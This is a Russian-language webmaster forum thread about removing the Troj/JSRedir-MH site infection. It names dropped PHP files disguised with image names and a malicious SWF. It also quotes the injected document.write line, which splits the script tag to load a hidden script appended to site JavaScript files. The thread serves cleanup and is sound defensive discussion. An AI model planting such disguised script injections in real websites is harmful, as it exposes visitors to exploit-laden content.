Яндекс нашел вирус на сайте

Troj/JSRedir-MH данный вирус также создает несколько php файлов, у меня они находились в папке с вирусным js и в соседних папках.

Спасибо, swf файл удалил, нашёл просто поиском по шаблону всех файлов с таким расширением, их у нас не так и много, "левый" сразу видно.

То же самое. Кстати их у меня легко нашёл на скачанном бэкапе вебовский cureit. Они лежали в папках с картинками, и имена взяли с одной из картинок в этих папках, только с расширением php. Вот так обзывались: gradient2b.php и no_avatar17.php.

Руки бы им по отрывать😡

Доброго дня!

Troj/JSRedir-MH в корне сайта

380точкаby

может кто подскажет где этот гребаный js.

Спасибо.

В конце /js/slide.js втавка

document.write("<scr"+"ipt src='/admin/media/js/jquery.js'><"+"/script>"); 

там скрипт который всавляет флешку /admin/media/images/forward_enabled.swf

Это все вы удаляете последствия, но не причину, вам обязательно нужно проверить ваш рабочий код движка.

Народ помогите... На днях подцепил это чудо и не могу его отыскать😡 Посмотрите на сайте:intercon(точка)in(точка)ua Зарание благодарен

document.write("<scr"+"ipt src='/admin/media/js/jquery.js'><"+"/script>"); 

Спасибо, за подсказу, во флехе Exploit.SWF.254 зашит.

Как это сделать?

Вот инструкция по этому вирусу - http://www.w2b.com.ua/audit/552-kak-udalit-virus-trojjsredir-mh-s-sajta.html

в Вашем конктретном случае то вирус с s5_dropdown файла начинается ☝

если сами не разберетесь, то обращайтесь в skype: w2b.kz или на мейл - support@w2b.kz , сделаем за 25$/200грн/800руб за 2-72 часа вернетесь в выдачу Яндекса нормальными.

gipnoz, в самом конце начиная с document.write /modules/mod_virtuemart_s5_dropdown_cart/s5_dropdown/s5_dropdown.js